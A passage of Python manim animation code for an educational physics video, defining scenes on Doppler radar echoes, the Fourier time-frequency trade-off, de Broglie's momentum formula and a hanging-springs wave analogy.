x_coords = self.object_x_coords
randy = self.pi_creature
self.frequency_spread_factor = 10
self.n_pulse_singletons = 4
self.pulse_frequency = 0.015
graphs = VGroup(*[
self.get_frequency_pulse_graph(x)
for x in x_coords
])
sum_graph = self.axes.get_graph(
lambda t : sum([
graph.underlying_function(t)
for graph in graphs
]),
num_graph_points = 1000
)
sum_graph.background_image_file = "blue_yellow_gradient"
pulses = self.get_pulses()
self.play(FadeOut(curr_graph))
self.add(*pulses)
self.wait(0.5)
self.play(
ShowCreation(
sum_graph,
rate_func=linear,
run_time = 3.5,
),
randy.change, "happy"
)
self.wait()
self.curr_graph = sum_graph
self.first_echo_graph = graphs[0]
self.first_echo_graph.set_color(YELLOW)
def fourier_transform_of_one_pulse(self):
frequency_axes = Axes(
x_min = 0, x_max = 20,
x_axis_config = {
"unit_size" : 0.5,
"tick_frequency" : 2,
},
y_min = -.01, y_max = .01,
y_axis_config = {
"unit_size" : 110,
"tick_frequency" : 0.006
}
)
frequency_label = TextMobject("Frequency")
frequency_label.next_to(frequency_axes.x_axis.get_right(), UP)
frequency_axes.add(frequency_label)
first_echo_graph = self.first_echo_graph
self.play(
ApplyMethod(
VGroup(self.axes, first_echo_graph).to_edge, UP,
{"buff" : SMALL_BUFF},
rate_func = squish_rate_func(smooth, 0.5, 1)
),
LaggedStartMap(FadeOut, self.objects),
LaggedStartMap(FadeOut, VGroup(
self.curr_graph, self.dish, self.pi_creature
)),
run_time = 2
)
#
frequency_axes.next_to(self.axes, DOWN, LARGE_BUFF, LEFT)
fourier_graph = get_fourier_graph(
frequency_axes, first_echo_graph.underlying_function,
t_min = 0, t_max = 25,
complex_to_real_func = np.abs,
)
fourier_graph.save_state()
fourier_graph.move_to(first_echo_graph)
h_vect = 4*RIGHT
fourier_graph.shift(h_vect)
fourier_graph.fade(1)
f = 8
v_line = DashedLine(
frequency_axes.coords_to_point(f, 0),
frequency_axes.coords_to_point(f, frequency_axes.y_max),
)
v_lines = VGroup(
v_line.copy().shift(2*LEFT),
v_line.copy().shift(2*RIGHT),
)
rect = Rectangle(stroke_width = 0, fill_color = YELLOW, fill_opacity = 0.25)
rect.replace(v_lines, stretch = True)
rect.save_state()
rect.stretch(0, 0)
self.play(Write(frequency_axes, run_time = 1))
self.play(
ApplyFunction(
lambda m : m.move_to(fourier_graph.saved_state).shift(-h_vect).fade(1),
first_echo_graph.copy(),
remover = True,
),
fourier_graph.restore
)
self.wait()
self.play(ShowCreation(v_line))
self.play(
ReplacementTransform(VGroup(v_line), v_lines),
rect.restore
)
self.wait()
self.play(FadeOut(v_lines), FadeOut(rect))
self.frequency_axes = frequency_axes
self.fourier_graph = fourier_graph
def show_echos_of_moving_objects(self):
objects = self.objects
objects.save_state()
object_velocities = self.object_velocities
movements = self.object_movements = [
always_shift(
obj,
direction = v/get_norm(v),
rate = get_norm(v)
)
for v, obj in zip(object_velocities, objects)
]
pulses = self.get_pulses()
continual_anims = pulses+movements
self.play(
FadeOut(self.axes),
FadeOut(self.first_echo_graph),
LaggedStartMap(FadeIn, objects),
FadeIn(self.dish)
)
self.add(*continual_anims)
self.wait(4)
self.play(*[
UpdateFromAlphaFunc(
obj,
lambda m, a : m.set_fill(opacity = 1-a),
)
for obj in objects
])
self.remove(*continual_anims)
self.wait()
def overlapping_frequenies_of_various_objects(self):
frequency_axes = self.frequency_axes
fourier_graph = self.fourier_graph
shifted_graphs = self.get_shifted_frequency_graphs(fourier_graph)
color = fourier_graph.get_color()
shifted_graphs.set_color_by_gradient(
average_color(color, WHITE),
color,
average_color(color, BLACK),
)
sum_graph = self.get_sum_graph(frequency_axes, shifted_graphs)
sum_graph.match_style(fourier_graph)
shifted_graphs.save_state()
self.play(ReplacementTransform(
VGroup(fourier_graph), shifted_graphs,
lag_ratio = 0.5,
run_time = 2
))
self.wait()
self.play(
shifted_graphs.arrange, DOWN,
shifted_graphs.move_to, fourier_graph, DOWN,
)
self.wait()
self.play(shifted_graphs.restore),
self.play(ReplacementTransform(
shifted_graphs, VGroup(sum_graph),
))
self.wait()
self.curr_fourier_graph = sum_graph
def echos_of_long_pure_signal_in_frequency_space(self):
curr_fourier_graph = self.curr_fourier_graph
f_max = self.frequency_axes.y_max
new_fourier_graph = self.frequency_axes.get_graph(
lambda x : f_max * np.exp(-100*(x-8)**2),
num_graph_points = 1000,
)
new_fourier_graph.set_color(PINK)
self.play(
FadeOut(curr_fourier_graph),
FadeIn(new_fourier_graph),
)
self.fourier_graph = new_fourier_graph
self.overlapping_frequenies_of_various_objects()
def concentrated_fourier_requires_long_time(self):
objects = self.objects
objects.restore()
object_movements = self.object_movements
self.n_pulse_singletons = 32
pulses = self.get_pulses()
randy = self.pi_creature
continual_anims = object_movements+pulses
self.play(FadeIn(randy))
self.add(*continual_anims)
self.play(randy.change, "angry", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = a))
for obj in objects
])
self.play(Blink(randy))
self.wait(2)
self.play(Blink(randy))
self.wait()
self.play(randy.change, "plain", *[
UpdateFromAlphaFunc(obj, lambda m, a : m.set_fill(opacity = 1-a))
for obj in objects
])
self.wait()
###
def get_frequency_pulse_graph(self, x, freq = 25, **kwargs):
graph = IntroduceDopplerRadar.get_frequency_pulse_graph(
self, x, freq, **kwargs
)
return graph
def get_pulse(self, dish, echo_object):
return RadarPulse(
dish, echo_object,
n_pulse_singletons = self.n_pulse_singletons,
frequency = 0.025,
speed = 5.0,
)
def get_pulses(self):
return [
self.get_pulse(
self.dish.copy().shift(0.01*obj.get_center()[0]),
obj
)
for obj in self.objects
]
def create_pi_creature(self):
randy = Randolph()
randy.scale(0.5).flip()
randy.to_edge(RIGHT, buff = 1.7).shift(0.5*UP)
return randy
def get_shifted_frequency_graphs(self, fourier_graph):
frequency_axes = self.frequency_axes
def get_func(v):
return lambda f : fourier_graph.underlying_function(np.clip(
f-5*v[0],
frequency_axes.x_min,
frequency_axes.x_max,
))
def get_graph(func):
return frequency_axes.get_graph(func)
shifted_graphs = VGroup(*list(map(
get_graph, list(map(get_func, self.object_velocities))
)))
shifted_graphs.match_style(fourier_graph)
return shifted_graphs
def get_sum_graph(self, axes, graphs):
def get_func(graph):
return graph.underlying_function
funcs = list(map(get_func, graphs))
return axes.get_graph(
lambda t : sum([func(t) for func in funcs]),
)
class SummarizeFourierTradeoffForDoppler(Scene):
def construct(self):
time_axes = Axes(
x_min = 0, x_max = 12,
y_min = -0.5, y_max = 1,
)
time_axes.center().to_edge(UP, buff = LARGE_BUFF)
frequency_axes = time_axes.copy()
frequency_axes.next_to(time_axes, DOWN, buff = 2)
time_label = TextMobject("Time")
frequency_label = TextMobject("Frequency")
for label, axes in (time_label, time_axes), (frequency_label, frequency_axes):
label.next_to(axes.get_right(), UP, SMALL_BUFF)
axes.add(label)
frequency_label.shift_onto_screen()
title = TextMobject("Fourier Trade-off")
title.next_to(time_axes, DOWN)
self.add(title)
#Position determines log of scale value for exponentials
a_mob = VectorizedPoint()
x_values = [3, 5, 6, 7, 8]
v_values = [5, 5.5, 5.75, 6.5, 7]
def get_top_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
time_axes.get_graph(lambda t : np.exp(-5*a*(t-x)**2))
for x in x_values
])
graphs.set_color(WHITE)
graphs.color_using_background_image("blue_yellow_gradient")
return graphs
def get_bottom_graphs():
a = np.exp(a_mob.get_center()[0])
graphs = VGroup(*[
frequency_axes.get_graph(lambda t : np.exp(-(5./a)*(t-v)**2))
for v in v_values
])
graphs.set_color(RED)
return graphs
top_graphs = get_top_graphs()
bottom_graphs = get_bottom_graphs()
update_top_graphs = Mobject.add_updater(
top_graphs,
lambda g : Transform(g, get_top_graphs()).update(1)
)
update_bottom_graphs = Mobject.add_updater(
bottom_graphs,
lambda g : Transform(g, get_bottom_graphs()).update(1)
)
self.add(time_axes, frequency_axes)
self.add(update_top_graphs, update_bottom_graphs)
shift_vect = 2*RIGHT
for s in 1, -2, 1:
self.play(a_mob.shift, s*shift_vect, run_time = 3)
class MentionUncertaintyPrincipleCopy(MentionUncertaintyPrinciple):
pass
class IntroduceDeBroglie(Scene):
CONFIG = {
"default_wave_frequency" : 1,
"wave_colors" : [BLUE_D, YELLOW],
"dispersion_factor" : 1,
"amplitude" : 1,
}
def construct(self):
text_scale_val = 0.8,
#Overlay real tower in video editor
eiffel_tower = Line(3*DOWN, 3*UP, stroke_width = 0)
picture = ImageMobject("de_Broglie")
picture.set_height(4)
picture.to_corner(UP+LEFT)
name = TextMobject("Louis de Broglie")
name.next_to(picture, DOWN)
picture.save_state()
picture.scale(0)
picture.move_to(eiffel_tower.get_top())
broadcasts = [
Broadcast(
eiffel_tower.get_top(),
big_radius = 10,
n_circles = 10,
lag_ratio = 0.9,
run_time = 7,
rate_func = squish_rate_func(smooth, a, a+0.3),
color = WHITE,
)
for a in np.linspace(0, 0.7, 3)
]
self.play(*broadcasts)
self.play(picture.restore)
self.play(Write(name))
self.wait()
#Time line
time_line = NumberLine(
x_min = 1900,
x_max = 1935,
tick_frequency = 1,
numbers_with_elongated_ticks = list(range(1900, 1941, 10)),
color = BLUE_D
)
time_line.stretch_to_fit_width(FRAME_WIDTH - picture.get_width() - 2)
time_line.add_numbers(*time_line.numbers_with_elongated_ticks)
time_line.next_to(picture, RIGHT, MED_LARGE_BUFF, DOWN)
year_to_words = {
1914 : "Wold War I begins",
1915 : "Einstein field equations",
1916 : "Lewis dot formulas",
1917 : "Not a lot of physics...because war",
1918 : "S'more Rutherford badassery",
1919 : "Eddington confirms general relativity predictions",
1920 : "World is generally stoked on general relativity",
1921 : "Einstein gets long overdue Nobel prize",
1922 : "Stern-Gerlach Experiment",
1923 : "Compton scattering observed",
1924 : "de Broglie's thesis"
}
arrow = Vector(DOWN, color = WHITE)
arrow.next_to(time_line.number_to_point(1914), UP)
words = TextMobject(year_to_words[1914])
words.scale(text_scale_val)
date = Integer(1914)
date.next_to(arrow, UP, LARGE_BUFF)
def get_year(alpha = 0):
return int(time_line.point_to_number(arrow.get_end()))
def update_words(words):
text = year_to_words.get(get_year(), "Hi there")
if text not in words.get_tex_string():
words.__init__(text)
words.scale(text_scale_val)
words.move_to(interpolate(
arrow.get_top(), date.get_bottom(), 0.5
))
update_words(words)
self.play(
FadeIn(time_line),
GrowArrow(arrow),
Write(words),
Write(date),
run_time = 1
)
self.wait()
self.play(
arrow.next_to, time_line.number_to_point(1924), UP,
ChangingDecimal(
date, get_year,
position_update_func = lambda m : m.next_to(arrow, UP, LARGE_BUFF)
),
UpdateFromFunc(words, update_words),
run_time = 3,
)
self.wait()
#Transform time_line
line = time_line
self.play(
FadeOut(time_line.numbers),
VGroup(arrow, words, date).shift, MED_LARGE_BUFF*UP,
*[
ApplyFunction(
lambda m : m.rotate(TAU/4).set_stroke(width = 0),
mob,
remover = True
)
for mob in time_line.tick_marks
]
)
#Wave function
particle = VectorizedPoint()
axes = Axes(x_min = -1, x_max = 10)
axes.match_width(line)
axes.shift(line.get_center() - axes.x_axis.get_center())
im_line = line.copy()
im_line.set_color(YELLOW)
wave_update_animation = self.get_wave_update_animation(
axes, particle, line, im_line
)
for x in range(3):
particle.move_to(axes.coords_to_point(-10, 0))
self.play(
ApplyMethod(
particle.move_to, axes.coords_to_point(22, 0),
rate_func=linear
),
wave_update_animation,
run_time = 3
)
self.wait()
###
def get_wave_update_animation(self, axes, particle, re_line = None, im_line = None):
line = Line(
axes.x_axis.get_left(),
axes.x_axis.get_right(),
)
if re_line is None:
re_line = line.copy()
re_line.set_color(self.wave_colors[0])
if im_line is None:
im_line = line.copy()
im_line.set_color(self.wave_colors[1])
lines = VGroup(im_line, re_line)
def update_lines(lines):
waves = self.get_wave_pair(axes, particle)
for line, wave in zip(lines, waves):
wave.match_style(line)
Transform(line, wave).update(1)
return UpdateFromFunc(lines, update_lines)
def get_wave(
self, axes, particle,
complex_to_real_func = lambda z : z.real,
freq = None,
**kwargs):
freq = freq or self.default_wave_frequency
k0 = 1./freq
t0 = axes.x_axis.point_to_number(particle.get_center())
def func(x):
dispersion = fdiv(1., self.dispersion_factor)*(np.sqrt(1./(1+t0**2)))
wave_part = complex_to_real_func(np.exp(
complex(0, TAU*freq*(x-dispersion))
))
bell_part = np.exp(-dispersion*(x-t0)**2)
amplitude = self.amplitude
return amplitude*wave_part*bell_part
graph = axes.get_graph(func)
return graph
def get_wave_pair(self, axes, particle, colors = None, **kwargs):
if colors is None and "color" not in kwargs:
colors = self.wave_colors
return VGroup(*[
self.get_wave(
axes, particle,
C_to_R, color = color,
**kwargs
)
for C_to_R, color in zip(
[lambda z : z.imag, lambda z : z.real],
colors
)
])
class ShowMomentumFormula(IntroduceDeBroglie, TeacherStudentsScene):
CONFIG = {
"default_wave_frequency" : 2,
"dispersion_factor" : 0.25,
"p_color" : BLUE,
"xi_color" : YELLOW,
"amplitude" : 0.5,
}
def construct(self):
self.introduce_formula()
self.react_to_claim()
def introduce_formula(self):
formula = p, eq, h, xi = TexMobject("p", "=", "h", "\\xi")
formula.move_to(ORIGIN)
formula.scale(1.5)
word_shift_val = 1.75
p_words = TextMobject("Momentum")
p_words.next_to(p, UP, LARGE_BUFF).shift(word_shift_val*LEFT)
p_arrow = Arrow(
p_words.get_bottom(), p.get_corner(UP+LEFT),
buff = SMALL_BUFF
)
added_p_words = TextMobject("(Classically $m \\times v$)")
added_p_words.move_to(p_words, DOWN)
VGroup(p, p_words, added_p_words, p_arrow).set_color(self.p_color)
xi_words = TextMobject("Spatial frequency")
added_xi_words = TextMobject("(cycles per unit \\emph{distance})")
xi_words.next_to(xi, UP, LARGE_BUFF).shift(word_shift_val*RIGHT)
xi_words.align_to(p_words)
xi_arrow = Arrow(
xi_words.get_bottom(), xi.get_corner(UP+RIGHT),
buff = SMALL_BUFF
)
added_xi_words.move_to(xi_words, DOWN)
added_xi_words.align_to(added_p_words, DOWN)
VGroup(xi, xi_words, added_xi_words, xi_arrow).set_color(self.xi_color)
axes = Axes(
x_min = 0, x_max = FRAME_WIDTH,
y_min = -1, y_max = 1,
)
axes.center().to_edge(UP, buff = -0.5)
# axes.next_to(formula, RIGHT)
particle = VectorizedPoint()
wave_update_animation = self.get_wave_update_animation(axes, particle)
wave = wave_update_animation.mobject
wave[0].set_stroke(width = 0)
particle.next_to(wave, LEFT, buff = 2)
wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, axes.coords_to_point(30, 0)),
wave_update_animation,
run_time = 4,
rate_func=linear,
)
stopped_wave_propagation = AnimationGroup(
ApplyMethod(particle.move_to, xi_words),
wave_update_animation,
run_time = 3,
rate_func=linear,
)
n_v_lines = 10
v_lines = VGroup(*[
DashedLine(UP, DOWN)
for x in range(n_v_lines)
])
v_lines.match_color(xi)
v_lines.arrange(
RIGHT,
buff = float(axes.x_axis.unit_size)/self.default_wave_frequency
)
v_lines.move_to(stopped_wave_propagation.sub_anims[0].target_mobject)
v_lines.align_to(wave)
v_lines.shift(0.125*RIGHT)
self.add(formula, wave)
self.play(
self.teacher.change, "raise_right_hand",
GrowArrow(p_arrow),
Succession(
Write, p_words,
ApplyMethod, p_words.next_to, added_p_words, UP,
),
FadeIn(
added_p_words,
rate_func = squish_rate_func(smooth, 0.5, 1),
run_time = 2,
),
wave_propagation
)
self.play(
Write(xi_words),
GrowArrow(xi_arrow),
self.get_student_changes("confused", "erm", "sassy"),
stopped_wave_propagation
)
self.play(
FadeIn(added_xi_words),
xi_words.next_to, added_xi_words, UP,
)
self.play(
LaggedStartMap(ShowCreation, v_lines),
self.get_student_changes(*["pondering"]*3)
)
self.play(LaggedStartMap(FadeOut, v_lines))
self.wait()
self.formula_labels = VGroup(
p_words, p_arrow, added_p_words,
xi_words, xi_arrow, added_xi_words,
)
self.set_variables_as_attrs(wave, wave_propagation, formula)
def react_to_claim(self):
formula_labels = self.formula_labels
full_formula = VGroup(self.formula, formula_labels)
full_formula.save_state()
wave_propagation = self.wave_propagation
student = self.students[2]
self.student_says(
"Hang on...",
bubble_kwargs = {"height" : 2, "width" : 2, "direction" : LEFT},
target_mode = "sassy",
student_index = 2,
added_anims = [self.teacher.change, "plain"]
)
student.bubble.add(student.bubble.content)
self.wait()
kwargs = {
"path_arc" : TAU/4,
"lag_ratio" : 0.5,
"lag_ratio" : 0.7,
"run_time" : 1.5,
}
self.play(
full_formula.scale, 0,
full_formula.move_to, student.eyes.get_bottom()+SMALL_BUFF*DOWN,
Animation(student.bubble),
**kwargs
)
self.play(full_formula.restore, Animation(student.bubble), **kwargs)
wave_propagation.update_config(
rate_func = lambda a : interpolate(0.35, 1, a)
)
self.play(
wave_propagation,
RemovePiCreatureBubble(student, target_mode = "confused"),
)
wave_propagation.update_config(rate_func = lambda t : t)
self.student_says(
"Physics is \\\\ just weird",
bubble_kwargs = {"height" : 2.5, "width" : 3},
target_mode = "shruggie",
student_index = 0,
added_anims = [ApplyMethod(full_formula.shift, UP)]
)
self.wait()
self.play(
wave_propagation,
ApplyMethod(full_formula.shift, DOWN),
FadeOut(self.students[0].bubble),
FadeOut(self.students[0].bubble.content),
self.get_student_changes(*3*["pondering"]),
self.teacher.change, "pondering",
)
self.play(wave_propagation)
class AskPhysicists(PiCreatureScene):
def construct(self):
morty, physy1, physy2, physy3 = self.pi_creatures
formula = TexMobject("p", "=", "h", "\\xi")
formula.set_color_by_tex_to_color_map({
"p" : BLUE,
"\\xi" : YELLOW,
})
formula.scale(1.5)
formula.to_edge(UP)
formula.save_state()
formula.shift(DOWN)
formula.fade(1)
self.play(formula.restore)
self.pi_creature_says(
morty, "So...why?",
target_mode = "maybe"
)
self.wait(2)
self.play(
RemovePiCreatureBubble(morty),
PiCreatureSays(
physy2,
"Take the Schrödinger equation \\\\ with $H = \\frac{p^2}{2m}+V(x)$",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy1,
"Even classically position and \\\\ momentum are conjugate",
target_mode = "surprised",
bubble_kwargs = {"fill_opacity" : 0.9},
),
)
self.play(
PiCreatureSays(
physy3,
"Consider special relativity \\\\ together with $E = hf$",
target_mode = "hooray",
bubble_kwargs = {"fill_opacity" : 0.9},
),
morty.change, "guilty"
)
self.wait(2)
###
def create_pi_creatures(self):
scale_factor = 0.85
morty = Mortimer().flip()
morty.scale(scale_factor)
morty.to_corner(DOWN+LEFT)
physies = VGroup(*[
PiCreature(color = c).flip()
for c in (GREY, LIGHT_GREY, DARK_GREY)
])
physies.arrange(RIGHT, buff = MED_SMALL_BUFF)
physies.scale(scale_factor)
physies.to_corner(DOWN+RIGHT)
self.add(physies)
return VGroup(morty, *physies)
class SortOfDopplerEffect(PiCreatureScene):
CONFIG = {
"omega" : np.pi,
"arrow_spacing" : 0.25,
}
def setup(self):
PiCreatureScene.setup(self)
rect = self.screen_rect = ScreenRectangle(height = FRAME_HEIGHT)
rect.set_stroke(width = 0)
self.camera = MovingCamera(
rect, **self.camera_config
)
def construct(self):
screen_rect = self.screen_rect
#x-coordinate gives time
t_tracker = VectorizedPoint()
#x-coordinate gives wave number
k_tracker = VectorizedPoint(2*RIGHT)
always_shift(t_tracker, RIGHT, 1)
def get_wave():
t = t_tracker.get_center()[0]
k = k_tracker.get_center()[0]
omega = self.omega
color = interpolate_color(
BLUE, RED, (k-2)/2.0
)
func = lambda x : 0.5*np.cos(omega*t - k*x)
graph = FunctionGraph(
func,
x_min = -5*FRAME_X_RADIUS,
x_max = FRAME_X_RADIUS,
color = color,
)
return VGroup(graph, *[
Arrow(
x*RIGHT, x*RIGHT + func(x)*UP,
color = color
)
for x in np.arange(
-4*FRAME_X_RADIUS, FRAME_X_RADIUS,
self.arrow_spacing
)
])
return
wave = get_wave()
wave_update = Mobject.add_updater(
wave, lambda w : Transform(w, get_wave()).update(1)
)
rect = ScreenRectangle(height = 2)
rect.to_edge(RIGHT)
always_shift(rect, LEFT, 1)
rect_movement = rect
randy = self.pi_creature
randy_look_at = Mobject.add_updater(
randy, lambda r : r.look_at(rect)
)
ref_frame1 = TextMobject("Reference frame 1")
# ref_frame1.next_to(randy, UP, aligned_edge = LEFT)
ref_frame1.to_edge(UP)
ref_frame2 = TextMobject("Reference frame 2")
ref_frame2.next_to(rect, UP)
# ref_frame2.set_fill(opacity = 0)
ref_frame2_follow = Mobject.add_updater(
ref_frame2, lambda m : m.next_to(rect, UP)
)
ref_frame_1_continual_anim = ContinualAnimation(ref_frame1)
self.add(
t_tracker, wave_update, rect_movement, randy_look_at,
ref_frame2_follow, ref_frame_1_continual_anim
)
self.add(ref_frame1)
self.play(randy.change, "pondering")
self.wait(4)
start_height = screen_rect.get_height()
start_center = screen_rect.get_center()
self.play(
UpdateFromAlphaFunc(
screen_rect,
lambda m, a : m.move_to(
interpolate(start_center, rect.get_center(), a)
)
),
k_tracker.shift, 2*RIGHT,
)
self.play(
MaintainPositionRelativeTo(
screen_rect, rect,
run_time = 4
),
)
self.play(
screen_rect.move_to, rect.get_right()+FRAME_X_RADIUS*LEFT,
k_tracker.shift, 2*LEFT,
)
#Frequency words
temporal_frequency = TextMobject("Temporal", "frequency")
spatial_frequency = TextMobject("Spatial", "frequency")
temporal_frequency.move_to(screen_rect).to_edge(UP)
spatial_frequency.next_to(temporal_frequency, DOWN)
cross = Cross(temporal_frequency[0])
time = TextMobject("Time")
space = TextMobject("Space")
time.next_to(temporal_frequency, RIGHT, buff = 2)
space.next_to(time, DOWN)
space.align_to(spatial_frequency)
self.play(FadeIn(temporal_frequency))
self.play(ShowCreation(cross))
self.play(Write(spatial_frequency))
self.wait()
self.play(FadeIn(time), FadeIn(space))
self.play(
Transform(time, space),
Transform(space, time),
lag_ratio = 0.5,
run_time = 1,
)
self.play(FadeOut(time), FadeOut(space))
self.wait(3)
###
def create_pi_creature(self):
return Randolph().scale(0.5).to_corner(DOWN+LEFT)
class HangingWeightsScene(MovingCameraScene):
CONFIG = {
"frequency" : 0.5,
"ceiling_radius" : 3*FRAME_X_RADIUS,
"n_springs" : 72,
"amplitude" : 0.6,
"spring_radius" : 0.15,
}
def construct(self):
self.setup_springs()
self.setup_weights()
self.introduce()
self.show_analogy_with_electron()
self.metaphor_for_something()
self.moving_reference_frame()
def setup_springs(self):
ceiling = self.ceiling = Line(LEFT, RIGHT)
ceiling.scale(self.ceiling_radius)
ceiling.to_edge(UP, buff = LARGE_BUFF)
self.add(ceiling)
def get_spring(alpha, height = 2):
t_max = 6.5
r = self.spring_radius
s = (height - r)/(t_max**2)
spring = ParametricFunction(
lambda t : op.add(
r*(np.sin(TAU*t)*RIGHT+np.cos(TAU*t)*UP),
s*((t_max - t)**2)*DOWN,
),
t_min = 0, t_max = t_max,
color = WHITE,
stroke_width = 2,
)
spring.alpha = alpha
spring.move_to(ceiling.point_from_proportion(alpha), UP)
spring.color_using_background_image("grey_gradient")
return spring
alphas = np.linspace(0, 1, self.n_springs)
bezier([0, 1, 0, 1])
springs = self.springs = VGroup(*list(map(get_spring, alphas)))
k_tracker = self.k_tracker = VectorizedPoint()
t_tracker = self.t_tracker = VectorizedPoint()
always_shift(t_tracker, RIGHT, 1)
self.t_tracker_walk = t_tracker
equilibrium_height = springs.get_height()
def update_springs(springs):
for spring in springs:
k = k_tracker.get_center()[0]
t = t_tracker.get_center()[0]
f = self.frequency
x = spring.get_top()[0]
A = self.amplitude
d_height = A*np.cos(TAU*f*t - k*x)
new_spring = get_spring(spring.alpha, 2+d_height)
Transform(spring, new_spring).update(1)
spring_update_anim = Mobject.add_updater(springs, update_springs)
self.spring_update_anim = spring_update_anim
spring_update_anim.update(0)
self.play(
ShowCreation(ceiling),
LaggedStartMap(ShowCreation, springs)
)
def setup_weights(self):
weights = self.weights = VGroup()
weight_anims = weight_anims = []
for spring in self.springs:
x = spring.get_top()[0]
mass = np.exp(-0.1*x**2)
weight = Circle(radius = 0.15)
weight.start_radius = 0.15
weight.target_radius = 0.25*mass #For future update
weight.spring = spring
weight_anim = Mobject.add_updater(
weight, lambda w : w.move_to(w.spring.get_bottom())
)
weight_anim.update(0)
weight_anims.append(weight_anim)
weights.add(weight)
weights.set_fill(opacity = 1)
weights.set_color_by_gradient(BLUE_D, BLUE_E, BLUE_D)
weights.set_stroke(WHITE, 1)
self.play(LaggedStartMap(GrowFromCenter, weights))
self.add(self.t_tracker_walk)
self.add(self.spring_update_anim)
self.add(*weight_anims)
def introduce(self):
arrow = Arrow(4*LEFT, LEFT)
arrows = VGroup(arrow, arrow.copy().flip(about_point = ORIGIN))
arrows.set_color(WHITE)
self.wait(3)
self.play(*list(map(GrowArrow, arrows)))
self.play(*[
UpdateFromAlphaFunc(
weight, lambda w, a : w.set_width(
2*interpolate(w.start_radius, w.target_radius, a)
),
run_time = 2
)
for weight in self.weights
])
self.play(FadeOut(arrows))
self.wait(3)
def show_analogy_with_electron(self):
words = TextMobject(
"Analogous to the energy of a particle \\\\",
"(in the sense of $E=mc^2$)"
)
words.move_to(DOWN)
self.play(Write(words))
self.wait(3)
self.play(FadeOut(words))
def metaphor_for_something(self):
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(3.5)
de_broglie.to_corner(DOWN+RIGHT)
words = TextMobject("""
If a photon's energy is carried as a wave \\\\
is this true for any particle?
""")
words.next_to(de_broglie, LEFT)
einstein = ImageMobject("Einstein")
einstein.match_height(de_broglie)
einstein.to_corner(DOWN+LEFT)
for picture in de_broglie, einstein:
picture.backdrop = Rectangle()
picture.backdrop.replace(picture, stretch = True)
picture.backdrop.set_fill(BLACK, 1)
picture.backdrop.set_stroke(BLACK, 0)
self.play(
Animation(de_broglie.backdrop, remover = True),
FadeIn(de_broglie)
)
self.play(Write(words))
self.wait(7)
self.play(
FadeOut(words),
Animation(einstein.backdrop, remover = True),
FadeIn(einstein)
)
self.wait(2)
self.de_broglie = de_broglie
self.einstein = einstein
def moving_reference_frame(self):
rect = ScreenRectangle(height = 2.1*FRAME_Y_RADIUS)
rect_movement = always_shift(rect, direction = LEFT, rate = 2)
camera_frame = self.camera_frame
self.add(rect)
self.play(
Animation(self.de_broglie.backdrop, remover = True),
FadeOut(self.de_broglie),
Animation(self.einstein.backdrop, remover = True),
FadeOut(self.einstein),
)
self.play(camera_frame.scale, 3, {"about_point" : 2*UP})
self.play(rect.shift, FRAME_WIDTH*RIGHT, path_arc = -TAU/2)
self.add(rect_movement)
self.wait(3)
def zoom_into_reference_frame():
original_height = camera_frame.get_height()
original_center = camera_frame.get_center()
self.play(
UpdateFromAlphaFunc(
camera_frame, lambda c, a : c.set_height(
interpolate(original_height, 0.95*rect.get_height(), a)
).move_to(
interpolate(original_center, rect.get_center(), a)
)
),
ApplyMethod(self.k_tracker.shift, RIGHT)
)
self.play(MaintainPositionRelativeTo(
camera_frame, rect,
run_time = 6
))
self.play(
camera_frame.set_height, original_height,
camera_frame.move_to, original_center,
ApplyMethod(self.k_tracker.shift, LEFT)
)
zoom_into_reference_frame()
self.wait()
self.play(
UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*(1-a)))
)
index = int(0.5*len(self.springs))
weights = VGroup(self.weights[index], self.weights[index+4])
flashes = list(map(self.get_peak_flash_anim, weights))
weights.save_state()
weights.set_fill(RED)
self.add(*flashes)
self.wait(5)
rect.align_to(camera_frame, RIGHT)
self.play(UpdateFromAlphaFunc(rect, lambda m, a : m.set_stroke(width = 2*a)))
randy = Randolph(mode = "pondering")
randy.look(UP+RIGHT)
de_broglie = ImageMobject("de_Broglie")
de_broglie.set_height(6)
de_broglie.next_to(4*DOWN, DOWN)
self.add(
Mobject.add_updater(
randy, lambda m : m.next_to(
rect.get_corner(DOWN+LEFT), UP+RIGHT, MED_LARGE_BUFF,
).look_at(weights)
),
de_broglie
)
self.wait(2)
zoom_into_reference_frame()
self.wait(8)
###
def get_peak_flash_anim(self, weight):
mobject = Mobject() #Dummy
mobject.last_y = 0
mobject.last_dy = 0
mobject.curr_anim = None
mobject.curr_anim_time = 0
mobject.time_since_last_flash = 0
def update(mob, dt):
mob.time_since_last_flash += dt
point = weight.get_center()
y = point[1]
mob.dy = y - mob.last_y
different_dy = np.sign(mob.dy) != np.sign(mob.last_dy)
if different_dy and mob.time_since_last_flash > 0.5:
mob.curr_anim = Flash(
VectorizedPoint(point),
flash_radius = 0.5,
line_length = 0.3,
run_time = 0.2,
)
mob.submobjects = [mob.curr_anim.mobject]
mob.time_since_last_flash = 0
mob.last_y = float(y)
mob.last_dy = float(mob.dy)
##
if mob.curr_anim:
mob.curr_anim_time += dt
if mob.curr_anim_time > mob.curr_anim.run_time:
mob.curr_anim = None
mob.submobjects = []
mob.curr_anim_time = 0
return
mob.curr_anim.update(mob.curr_anim_time/mob.curr_anim.run_time)
return Mobject.add_updater(mobject, update)
class MinutPhysicsWrapper(Scene):
def construct(self):
logo = ImageMobject("minute_physics_logo", invert = True)
logo.to_corner(UP+LEFT)
self.add(logo)
title = TextMobject("Minute Physics on special relativity")
title.to_edge(UP).shift(MED_LARGE_BUFF*RIGHT)
screen_rect = ScreenRectangle()
screen_rect.set_width(title.get_width() + LARGE_BUFF)
screen_rect.next_to(title, DOWN)
self.play(ShowCreation(screen_rect))
self.play(Write(title))
self.wait(2)
class WhatDoesTheFourierTradeoffTellUs(TeacherStudentsScene):
def construct(self):
self.teacher_says(
"So! What does \\\\ the Fourier trade-off \\\\ tell us?",
target_mode = "surprised",
bubble_kwargs = {"width" : 4, "height" : 3}
)
self.change_student_modes(*["thinking"]*3)
self.wait(4)
class FourierTransformOfWaveFunction(Scene):
CONFIG = {
"wave_stroke_width" : 3,
"wave_color" : BLUE,
}
def construct(self):
self.show_wave_packet()
self.take_fourier_transform()
self.show_correlations_with_pure_frequencies()
self.this_is_momentum()
self.show_tradeoff()
def setup(self):
